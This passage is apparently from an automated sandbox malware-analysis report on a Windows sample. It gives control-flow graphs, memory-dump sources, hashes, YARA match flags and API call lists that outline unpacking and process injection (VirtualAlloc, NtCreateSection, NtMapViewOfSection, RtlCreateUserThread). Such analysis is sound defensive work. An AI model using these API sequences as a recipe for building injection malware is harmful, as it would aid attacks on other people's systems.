                                                                                      control_flow_graph 582 402fe9-40300d 583 403140-403145 582->583 584 403013-40302b 582->584 584->583 585 403031-403042 584->585 586 403044-40304d 585->586 587 403052-403060 586->587 587->587 588 403062-403069 587->588 589 40308b-403092 588->589 590 40306b-40308a 588->590 591 4030b4-4030b7 589->591 592 403094-4030b3 589->592 590->589 593 4030c0 591->593 594 4030b9-4030bc 591->594 592->591 593->586 596 4030c2-4030c7 593->596 594->593 595 4030be 594->595 595->596 596->583 597 4030c9-4030cc 596->597 597->583 598 4030ce-40313d RtlCreateUserThread NtTerminateProcess 597->598 598->583
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcessTerminateThreadUser
                                                                                      • String ID:
                                                                                      • API String ID: 1921587553-0
                                                                                      • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                      • Instruction ID: 3e1675bac70c022a4e457ffe6b5fa54937b73e0116388ba90aec32851b4d9964
                                                                                      • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                      • Instruction Fuzzy Hash: A1412431228E088FD768EF5CA885762B7D5F798311F6643AAE809D7389EA34DC1183C5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 599 6e0d11-6e0d2a 600 6e0d2c-6e0d2e 599->600 601 6e0d35-6e0d41 CreateToolhelp32Snapshot 600->601 602 6e0d30 600->602 603 6e0d43-6e0d49 601->603 604 6e0d51-6e0d5e Module32First 601->604 602->601 603->604 611 6e0d4b-6e0d4f 603->611 605 6e0d67-6e0d6f 604->605 606 6e0d60-6e0d61 call 6e09d0 604->606 609 6e0d66 606->609 609->605 611->600 611->604
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006E0D39
                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 006E0D59
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1462755251.00000000006DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 006DE000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_6de000_7Y18r(14).jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                      • String ID:
                                                                                      • API String ID: 3833638111-0
                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                      • Instruction ID: cda4395146910774a27b4ca34aed0eaf7452307566ac7b0c094544ae140b3e2e
                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                      • Instruction Fuzzy Hash: 32F0C235101314ABE7203AFAAC8CBAA72EAAF48320F100528E642911C1DAF0FC854B61

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 417d6f-417d89 2 417d8b-417d90 0->2 3 417d92-417da4 2->3 4 417da6 2->4 5 417dac-417db2 3->5 4->5 6 417dc5-417dcb 5->6 7 417db4-417dbb 5->7 6->2 8 417dcd 6->8 7->6 9 417dcf-417dd4 8->9 10 417de2-417de8 9->10 11 417dd6-417ddc 9->11 10->9 12 417dea-417df4 10->12 11->10 13 417dfa-417e72 lstrcatW InterlockedExchangeAdd WriteConsoleA lstrcpynW GetAtomNameA SetFileApisToANSI SetVolumeMountPointA GetModuleFileNameW EnumDateFormatsA 12->13 14 417e8c-417e8d 12->14 16 417e74-417e77 13->16 17 417e7e-417e8b 13->17 15 417e8f-417e99 14->15 18 417e9b-417ea4 GlobalAlloc AddAtomA 15->18 19 417eaa-417ec5 GetCommProperties SetLastError 15->19 16->17 17->14 18->19 20 417ec7-417ec8 GetProcessDefaultLayout 19->20 21 417ece-417ed8 19->21 20->21 24 417ee1-417ef6 GetConsoleAliasesA 21->24 25 417eda-417edb ReleaseActCtx 21->25 27 417ef8-417eff 24->27 28 417f0c-417f13 24->28 25->24 27->28 29 417f01-417f06 FoldStringW 27->29 28->15 30 417f19-417f23 28->30 29->28 31 417f25-417f47 30->31 32 417f94-417fa2 call 417af5 30->32 36 417f67-417f91 GetConsoleAliasesLengthW 31->36 37 417f49-417f5d SetConsoleTitleA LocalFree 31->37 38 417fa4-417fd6 32->38 39 417fe7-417ff3 LoadLibraryA call 417b32 call 417b14 32->39 36->32 37->36 40 417fe2-417fe5 38->40 41 417fd8 38->41 48 417ff8-417fff call 417d30 39->48 40->38 40->39 41->40 52 418000-418005 48->52 54 418007 call 417b09 52->54 55 41800c-418012 52->55 54->55 55->52 57 418014 55->57 58 41801e-418024 57->58 60 418032-418039 58->60 61 418026-418030 58->61 60->58 62 41803b-418047 60->62 61->60 61->62
                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(?,00000000), ref: 00417E02
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00417E10
                                                                                      • WriteConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417E27
                                                                                      • lstrcpynW.KERNEL32(?,00000000,00000000), ref: 00417E36
                                                                                      • GetAtomNameA.KERNEL32(00000000,00000000,00000000), ref: 00417E3F
                                                                                      • SetFileApisToANSI.KERNEL32 ref: 00417E45
                                                                                      • SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 00417E4D
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00417E5C
                                                                                      • EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00417E65
                                                                                      • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00417E9D
                                                                                      • AddAtomA.KERNEL32(00000000), ref: 00417EA4
                                                                                      • GetCommProperties.KERNELBASE(00000000,?), ref: 00417EB2
                                                                                      • SetLastError.KERNEL32(00000000), ref: 00417EB9
                                                                                      • GetProcessDefaultLayout.USER32(00000000), ref: 00417EC8
                                                                                      • ReleaseActCtx.KERNEL32(00000000), ref: 00417EDB
                                                                                      • GetConsoleAliasesA.KERNEL32(?,00000000,00000000), ref: 00417EEA
                                                                                      • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00417F06
                                                                                      • SetConsoleTitleA.KERNEL32(00000000), ref: 00417F4A
                                                                                      • LocalFree.KERNEL32(00000000), ref: 00417F51
                                                                                      • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00417F68
                                                                                      • LoadLibraryA.KERNELBASE(0041A448), ref: 00417FEC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1462016010.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_40b000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$AliasesAtomFileName$AllocApisCommDateDefaultEnumErrorExchangeFoldFormatsFreeGlobalInterlockedLastLayoutLengthLibraryLoadLocalModuleMountPointProcessPropertiesReleaseStringTitleVolumeWritelstrcatlstrcpyn
                                                                                      • String ID: k`$tl_$}$
                                                                                      • API String ID: 2707108674-211918992
                                                                                      • Opcode ID: 5247a80322c137a15aa0b1bfea1bb19969df6e1595c2137d50653716045b0f87
                                                                                      • Instruction ID: ddf06cef7b4f2340048b7641273970f77a1e110b5080587248a091a61e489f39
                                                                                      • Opcode Fuzzy Hash: 5247a80322c137a15aa0b1bfea1bb19969df6e1595c2137d50653716045b0f87
                                                                                      • Instruction Fuzzy Hash: FE61AE71506124ABD725AB66EC58DEF3F7CFF0A355B10417AF205D2121CB388A82CBAD

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 115 60003c-600047 116 600049 115->116 117 60004c-600263 call 600a3f call 600e0f call 600d90 VirtualAlloc 115->117 116->117 132 600265-600289 call 600a69 117->132 133 60028b-600292 117->133 137 6002ce-6003c2 VirtualProtect call 600cce call 600ce7 132->137 135 6002a1-6002b0 133->135 136 6002b2-6002cc 135->136 135->137 136->135 144 6003d1-6003e0 137->144 145 6003e2-600437 call 600ce7 144->145 146 600439-6004b8 VirtualFree 144->146 145->144 148 6005f4-6005fe 146->148 149 6004be-6004cd 146->149 150 600604-60060d 148->150 151 60077f-600789 148->151 153 6004d3-6004dd 149->153 150->151 156 600613-600637 150->156 154 6007a6-6007b0 151->154 155 60078b-6007a3 151->155 153->148 158 6004e3-600505 153->158 159 6007b6-6007cb 154->159 160 60086e-6008be LoadLibraryA 154->160 155->154 161 60063e-600648 156->161 166 600517-600520 158->166 167 600507-600515 158->167 163 6007d2-6007d5 159->163 165 6008c7-6008f9 160->165 161->151 164 60064e-60065a 161->164 168 600824-600833 163->168 169 6007d7-6007e0 163->169 164->151 170 600660-60066a 164->170 171 600902-60091d 165->171 172 6008fb-600901 165->172 173 600526-600547 166->173 167->173 177 600839-60083c 168->177 174 6007e2 169->174 175 6007e4-600822 169->175 176 60067a-600689 170->176 172->171 178 60054d-600550 173->178 174->168 175->163 179 600750-60077a 176->179 180 60068f-6006b2 176->180 177->160 181 60083e-600847 177->181 183 6005e0-6005ef 178->183 184 600556-60056b 178->184 179->161 185 6006b4-6006ed 180->185 186 6006ef-6006fc 180->186 187 600849 181->187 188 60084b-60086c 181->188 183->153 189 60056d 184->189 190 60056f-60057a 184->190 185->186 191 60074b 186->191 192 6006fe-600748 186->192 187->160 188->177 189->183 193 60059b-6005bb 190->193 194 60057c-600599 190->194 191->176 192->191 199 6005bd-6005db 193->199 194->199 199->178
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0060024D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_600000_7Y18r(14).jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID: cess$kernel32.dll
                                                                                      • API String ID: 4275171209-1230238691
                                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                      • Instruction ID: bbbf4db3596f4485a88410cc2d3c193017e3a9667bdecbbed5112f2fd1dd1f22
                                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                      • Instruction Fuzzy Hash: 02526974A01229DFDB64CF58C985BA9BBB1BF09304F1480E9E54DAB391DB30AE85DF14

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 612 600e0f-600e24 SetErrorMode * 2 613 600e26 612->613 614 600e2b-600e2c 612->614 613->614
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,00600223,?,?), ref: 00600E19
                                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,00600223,?,?), ref: 00600E1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_600000_7Y18r(14).jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                      • Instruction ID: 5e5b7fc9be17af52c8aa1593ebc2cf7226538b4808b2ec5a12ddc81c56322646
                                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                      • Instruction Fuzzy Hash: 08D0123114512877D7002A94DC09BCE7B1CDF05B62F008411FB0DE9180C770994046E5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 615 417b14-417b31 VirtualProtect
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(00000040,?), ref: 00417B2A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1462016010.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_40b000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: bef717294446de930566c56004e6725fcd1278c60b61f264854cca6fbe4bfdb3
                                                                                      • Instruction ID: ba6cbb3cd07b257a8cb762b1762eaf264e462e583e55377f58ee2727f3315d2d
                                                                                      • Opcode Fuzzy Hash: bef717294446de930566c56004e6725fcd1278c60b61f264854cca6fbe4bfdb3
                                                                                      • Instruction Fuzzy Hash: 9BC08C7520020ABFCB018B82FC01E863B6CE308284F004271F702A00B0C2B1E900AB1C
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00001388), ref: 00401966
                                                                                        • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                        • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                        • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                      • String ID:
                                                                                      • API String ID: 1885482327-0
                                                                                      • Opcode ID: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                                                      • Instruction ID: 41df8370e0b5f9a47a14a91e784646d83bdfa422f97ac69dcfec837627d5bcb0
                                                                                      • Opcode Fuzzy Hash: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                                                      • Instruction Fuzzy Hash: 6D018CF520C148E7EB016A948DB1EBA36299B45324F300233B647B91F4C57C8A03E76F
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00001388), ref: 00401966
                                                                                        • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                        • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                        • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                      • String ID:
                                                                                      • API String ID: 1885482327-0
                                                                                      • Opcode ID: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                                                                      • Instruction ID: 34fc3aff5e218d4630d956a4f9c4c41b7245144a44faa4fd8074b33eba8f9d72
                                                                                      • Opcode Fuzzy Hash: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                                                                      • Instruction Fuzzy Hash: 43017CF5208145E7EB015A948DB0EBA26299B45314F300237B617BA1F4C57D8602E76F
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006E0A21
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1462755251.00000000006DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 006DE000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_6de000_7Y18r(14).jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                      • Instruction ID: c1a3775681a7cb621aca036aab15b995d891dc2db0ab9b45b0648f2aa71087a6
                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                      • Instruction Fuzzy Hash: C8113C79A00248EFDB01DF99C985E98BBF5AF08751F1580A4F9489B362D371EA90DF80
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00001388), ref: 00401966
                                                                                        • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                        • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                        • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                      • String ID:
                                                                                      • API String ID: 1885482327-0
                                                                                      • Opcode ID: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                                                                      • Instruction ID: 53d82b158b021bc4b6cde56962adc0b8c8d23177238c0d6ee964112a53f005ae
                                                                                      • Opcode Fuzzy Hash: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                                                                      • Instruction Fuzzy Hash: 38F0AFB6308249F7DB01AA908DB1EBA36299B54315F300633B617B91F5C57C8A12E76F
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00001388), ref: 00401966
                                                                                        • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                        • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                        • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                      • String ID:
                                                                                      • API String ID: 1885482327-0
                                                                                      • Opcode ID: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                                                                      • Instruction ID: f7568a5a22988f4b084f7ac8228f9b89e575eda69d31bfffabc36cd9cbe45c64
                                                                                      • Opcode Fuzzy Hash: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                                                                      • Instruction Fuzzy Hash: BDF0C2B6208144F7DB019AA18DB1FBA36299B44314F300233BA17B90F5C67C8612E76F
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00001388), ref: 00401966
                                                                                        • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                        • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                        • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                      • String ID:
                                                                                      • API String ID: 1885482327-0
                                                                                      • Opcode ID: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                                                                      • Instruction ID: 9d6088553fbd849a34ffa1589a5f9bffd683413c7e042594889390f4c4f3f426
                                                                                      • Opcode Fuzzy Hash: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                                                                      • Instruction Fuzzy Hash: 08F0C2B2208144F7DB019A958DA0FBA36299B44314F300633B617B91F5C57C8A02E72F
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNELBASE(00000000,00417F99), ref: 00417AFD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1462016010.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_40b000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocGlobal
                                                                                      • String ID:
                                                                                      • API String ID: 3761449716-0
                                                                                      • Opcode ID: 0978ef2af6f889954126f1639b5d39f7fcb4e9f6f80359241490d42005375475
                                                                                      • Instruction ID: 11052f0533907eac1b5ead624f86bd19dd77f4dadc222b17fd93c0952cc8d916
                                                                                      • Opcode Fuzzy Hash: 0978ef2af6f889954126f1639b5d39f7fcb4e9f6f80359241490d42005375475
                                                                                      • Instruction Fuzzy Hash: DDB092B08083059FEB404F269C093593A20F704272F18877AED28882E5EBA08A40AF25
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNELBASE(00000000,00417F99), ref: 00417AFD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1462016010.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_40b000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocGlobal
                                                                                      • String ID:
                                                                                      • API String ID: 3761449716-0
                                                                                      • Opcode ID: 82d2b05aa270e2ebe1c3121fb221fe189987ee2b6f2f6f9fdafd653cff0eabde
                                                                                      • Instruction ID: cd47c4b9bc37ffacf91a7bbe6c6ae0b538b313659090cfa5301434a9e3d42730
                                                                                      • Opcode Fuzzy Hash: 82d2b05aa270e2ebe1c3121fb221fe189987ee2b6f2f6f9fdafd653cff0eabde
                                                                                      • Instruction Fuzzy Hash: 77B012B44002008FC7400F50AC14B413E20E30C343F008334E60444170C7704100BF19
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_600000_7Y18r(14).jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .$GetProcAddress.$l
                                                                                      • API String ID: 0-2784972518
                                                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                      • Instruction ID: ca3e0dc928b3eb58f5f920a532e04de175240ee417e0ebceb62b96e15e73e0bb
                                                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                      • Instruction Fuzzy Hash: 683137B6900609DFEB14CF99C880BAEBBF6FF48324F25504AD441A7351D771EA45CBA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1462755251.00000000006DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 006DE000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_6de000_7Y18r(14).jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                      • Instruction ID: bd4ba21ee053fb4504af7c315df4e4b81d857cdd4a987e5d6b8c7acdbf418dad
                                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                      • Instruction Fuzzy Hash: A01182727412409FE754DF56DC81FA673EAFB88320B298055ED08CB312E6B5EC52C760
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_600000_7Y18r(14).jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                      • Instruction ID: 0d8b75db3329e727e2f298a538b10a5da1ac7c04e1debf53f6a48a6320adb0d8
                                                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                      • Instruction Fuzzy Hash: FD01A7766406048FEF25CF64C804BEB33E6EF85315F4544E5D506973C2E774A9418B90
                                                                                      APIs
                                                                                      • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00417C8F
                                                                                      • OpenJobObjectW.KERNEL32(00000000,00000000,00000000), ref: 00417CAC
                                                                                      • BuildCommDCBW.KERNEL32(00000000,?), ref: 00417CB7
                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 00417CBE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1462016010.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_40b000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$BuildCommCreateLibraryLoadOpen
                                                                                      • String ID:
                                                                                      • API String ID: 2043902199-0
                                                                                      • Opcode ID: 31cceed8ed1ed4da9f0d8d6c08b2eb6b474c8c2503fdc1db59d39d211b27b345
                                                                                      • Instruction ID: ff2d894db08d9522882be8ab69f88837e2f2e12f0baac11470308de566c9cd02
                                                                                      • Opcode Fuzzy Hash: 31cceed8ed1ed4da9f0d8d6c08b2eb6b474c8c2503fdc1db59d39d211b27b345
                                                                                      • Instruction Fuzzy Hash: A5E06D31402124EB8B106F25ED1CCCB7FBCEF0A355B008224F50191161E3384A41CFED
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(004B1090), ref: 00417BFE
                                                                                      • GetProcAddress.KERNEL32(00000000,0041E260), ref: 00417C3B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1462016010.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_40b000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID:
                                                                                      • API String ID: 1646373207-3916222277
                                                                                      • Opcode ID: ed2083ff09e95ea6850085758e8778e50b5988604f5a41a0041129fa4c538e93
                                                                                      • Instruction ID: 842860c07696174ee3ee74213301e8bfe93044c7bdd6e35420a9822fc7fd421d
                                                                                      • Opcode Fuzzy Hash: ed2083ff09e95ea6850085758e8778e50b5988604f5a41a0041129fa4c538e93
                                                                                      • Instruction Fuzzy Hash: DC31822955C3C0D9F30197A9BC367A13BA99B15B44F5446BADE448B2B1D3F60584C32E

                                                                                      Execution Graph

                                                                                      Execution Coverage:28.8%
                                                                                      Dynamic/Decrypted Code Coverage:10.4%
                                                                                      Signature Coverage:23.6%
                                                                                      Total number of Nodes:297
                                                                                      Total number of Limit Nodes:11
